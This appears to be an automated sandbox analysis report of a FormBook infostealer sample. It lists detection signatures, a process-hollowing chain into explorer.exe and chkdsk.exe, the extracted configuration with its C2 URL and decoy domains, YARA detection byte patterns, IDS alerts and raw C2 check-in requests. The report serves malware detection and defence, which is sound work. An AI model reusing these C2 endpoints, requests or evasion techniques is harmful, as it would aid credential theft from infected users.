Windows Analysis Report
inlaww321345.exe

Overview

General Information

Sample Name: inlaww321345.exe
Analysis ID: 626561
MD5: 43e64e0ab6ca479c2af3afed56216a91
SHA1: 983a822ffde2b558dfe2a8ac1dcc4d42df0f1d94
SHA256: cbdf1e33bc694b1ca634a4b042bd010050c9baf99078c91adf961ef92cebd305
Tags: exe, formbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • inlaww321345.exe (PID: 6464 cmdline: "C:\Users\user\Desktop\inlaww321345.exe" MD5: 43E64E0AB6CA479C2AF3AFED56216A91)
    • idczzzzbpy.exe (PID: 6492 cmdline: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk MD5: 0A3F789C1F124B76E2EDC74EBEACF70A)
      • idczzzzbpy.exe (PID: 6516 cmdline: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk MD5: 0A3F789C1F124B76E2EDC74EBEACF70A)
        • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • chkdsk.exe (PID: 6248 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
            • cmd.exe (PID: 6368 cmdline: /c del "C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 1804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.boxberry-my.com/sn31/"], "decoy": ["matsuomatsuo.com", "104wn.com", "bolacorner.com", "dawonderer.com", "yourpamlano.xyz", "mtzmx.icu", "lepakzaparket.com", "barmagli.com", "danta.ltd", "marumaru240.com", "people-centeredhr.com", "test-brew-inc.com", "clairvoyantbusinesscoach.com", "aforeignexchangeblog.com", "erentekbilisim.com", "gangqinqu123.net", "defiguaranteebonds.com", "thegioigaubong97.site", "vaoiwin.info", "vcwholeness.com", "03c3twpfee5estjovfu2655.com", "mutantapeyachtclubtoken.store", "pixelkev.xyz", "corporacioncymaz.com", "iampro-found.com", "azureconsults.com", "bam-bong.com", "advanceresubeopene.biz", "tzjisheng.com", "krdz28.online", "ycw2009.com", "minioe.com", "dronelink.xyz", "autu.cfd", "sdwmkj.com", "uixray.xyz", "informacion-numero-24-h.site", "123dianyingyuan.com", "tj-assets.com", "usaservicedogregistratuon.com", "metagwnics.com", "pepeksquad2.host", "kc7.club", "yundtremark.com", "finance-employers.com", "euroglobalnews.info", "estudioenzetti.com", "rodosmail.xyz", "bm65.xyz", "bchmtn.net", "server4uuss.net", "maisonretraiteprivee.com", "atelierelzaaidar.com", "thegurlyboutique.com", "primobellaquartz.com", "jetskirentaldublin.com", "akmeetech.com", "withoutyoutube.com", "blackcreekwatershed.com", "89qp52.com", "e3488.com", "vote4menk.com", "tyma.club", "theceditpalooza.com"]}
Source | Rule | Description | Author | Strings
00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Source | Rule | Description | Author | Strings
      2.2.idczzzzbpy.exe.400000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        2.2.idczzzzbpy.exe.400000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.idczzzzbpy.exe.400000.1.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x18849:$sqlite3step: 68 34 1C 7B E1
        • 0x1895c:$sqlite3step: 68 34 1C 7B E1
        • 0x18878:$sqlite3text: 68 38 2A 90 C5
        • 0x1899d:$sqlite3text: 68 38 2A 90 C5
        • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
        1.2.idczzzzbpy.exe.700000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          1.2.idczzzzbpy.exe.700000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          No Sigma rule has matched
          Timestamp: 05/14/22-13:08:49.696707
          Source IP: 192.168.2.3
          Destination IP: 188.114.96.10
          SID: 2031449
          Source Port: 49808
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected
          Timestamp: 05/14/22-13:08:49.696707
          Source IP: 192.168.2.3
          Destination IP: 188.114.96.10
          SID: 2031453
          Source Port: 49808
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected
          Timestamp: 05/14/22-13:08:49.696707
          Source IP: 192.168.2.3
          Destination IP: 188.114.96.10
          SID: 2031412
          Source Port: 49808
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          AV Detection

          Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.boxberry-my.com/sn31/"], "decoy": ["matsuomatsuo.com", "104wn.com", "bolacorner.com", "dawonderer.com", "yourpamlano.xyz", "mtzmx.icu", "lepakzaparket.com", "barmagli.com", "danta.ltd", "marumaru240.com", "people-centeredhr.com", "test-brew-inc.com", "clairvoyantbusinesscoach.com", "aforeignexchangeblog.com", "erentekbilisim.com", "gangqinqu123.net", "defiguaranteebonds.com", "thegioigaubong97.site", "vaoiwin.info", "vcwholeness.com", "03c3twpfee5estjovfu2655.com", "mutantapeyachtclubtoken.store", "pixelkev.xyz", "corporacioncymaz.com", "iampro-found.com", "azureconsults.com", "bam-bong.com", "advanceresubeopene.biz", "tzjisheng.com", "krdz28.online", "ycw2009.com", "minioe.com", "dronelink.xyz", "autu.cfd", "sdwmkj.com", "uixray.xyz", "informacion-numero-24-h.site", "123dianyingyuan.com", "tj-assets.com", "usaservicedogregistratuon.com", "metagwnics.com", "pepeksquad2.host", "kc7.club", "yundtremark.com", "finance-employers.com", "euroglobalnews.info", "estudioenzetti.com", "rodosmail.xyz", "bm65.xyz", "bchmtn.net", "server4uuss.net", "maisonretraiteprivee.com", "atelierelzaaidar.com", "thegurlyboutique.com", "primobellaquartz.com", "jetskirentaldublin.com", "akmeetech.com", "withoutyoutube.com", "blackcreekwatershed.com", "89qp52.com", "e3488.com", "vote4menk.com", "tyma.club", "theceditpalooza.com"]}
          Source: inlaww321345.exe Virustotal: Detection: 53%
          Source: inlaww321345.exe ReversingLabs: Detection: 56%
          Source: Yara match File source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: www.boxberry-my.com/sn31/ Avira URL Cloud: Label: malware
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe ReversingLabs: Detection: 46%
          Source: inlaww321345.exe Joe Sandbox ML: detected
          Source: 2.0.idczzzzbpy.exe.400000.7.unpack Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.idczzzzbpy.exe.700000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.idczzzzbpy.exe.400000.9.unpack Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.idczzzzbpy.exe.400000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.idczzzzbpy.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
          Source: inlaww321345.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: inlaww321345.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\nwmcc\xasivn\insq\a82874181cac4c8c8d839f9e6026f5f4\nkrdof\moxadzwk\Release\moxadzwk.pdb source: inlaww321345.exe, 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmp, idczzzzbpy.exe, 00000001.00000000.239867122.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, idczzzzbpy.exe, 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, idczzzzbpy.exe, 00000002.00000000.244915451.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, chkdsk.exe, 00000010.00000002.507707421.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.509886446.00000000058BF000.00000004.10000000.00040000.00000000.sdmp, nsuD94B.tmp.0.dr, idczzzzbpy.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: idczzzzbpy.exe, 00000001.00000003.245625219.000000001A210000.00000004.00001000.00020000.00000000.sdmp, idczzzzbpy.exe, 00000001.00000003.242881004.000000001A080000.00000004.00001000.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.251002261.0000000001304000.00000004.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.320891841.000000000175F000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.253061392.00000000014AD000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.319381710.0000000005057000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.321067477.00000000051F7000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: idczzzzbpy.exe, idczzzzbpy.exe, 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.251002261.0000000001304000.00000004.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.320891841.000000000175F000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.253061392.00000000014AD000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000010.00000003.319381710.0000000005057000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.321067477.00000000051F7000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\inlaww321345.exe Code function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D7A
          Source: C:\Users\user\Desktop\inlaww321345.exe Code function: 0_2_004069A4 FindFirstFileW,FindClose, 0_2_004069A4
          Source: C:\Users\user\Desktop\inlaww321345.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 4x nop then pop ebx 2_2_00407B1D
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 4x nop then pop edi 2_2_00417DA4
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 4x nop then pop ebx 16_2_00977B1D
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 4x nop then pop edi 16_2_00987DA4

          Networking

          Source: C:\Windows\explorer.exe Network Connect: 188.114.96.10 80
          Source: C:\Windows\explorer.exe Network Connect: 154.85.152.171 80
          Source: C:\Windows\explorer.exe Domain query: www.informacion-numero-24-h.site
          Source: C:\Windows\explorer.exe Domain query: www.tzjisheng.com
          Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49808 -> 188.114.96.10:80
          Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49808 -> 188.114.96.10:80
          Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49808 -> 188.114.96.10:80
          Source: DNS query: www.rodosmail.xyz
          Source: Malware configuration extractor URLs: www.boxberry-my.com/sn31/
          Source: Joe Sandbox View ASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
          Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global traffic HTTP traffic detected: GET /sn31/?3fK84j=bDKp2PCxjp9Dyht0&p6Ah=F3OPTzYh/KYNQDx4mU9pmepphtdjiinNkarquV5J38/xiILCZYJsFfYNFvKas6or25OS HTTP/1.1 Host: www.informacion-numero-24-h.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /sn31/?p6Ah=2a7s6yRQu5sKFClQSChidlXjlxi9pt4Q5wJ1geib+tah5K7nc27GLkEkTe4Wsszvrpha&3fK84j=bDKp2PCxjp9Dyht0 HTTP/1.1 Host: www.tzjisheng.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View IP Address: 188.114.96.10 188.114.96.10
          Source: inlaww321345.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: unknown DNS traffic detected: queries for: www.informacion-numero-24-h.site
          Source: C:\Users\user\Desktop\inlaww321345.exe Code function: 0_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_0040580F

          E-Banking Fraud

          Source: Yara match File source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
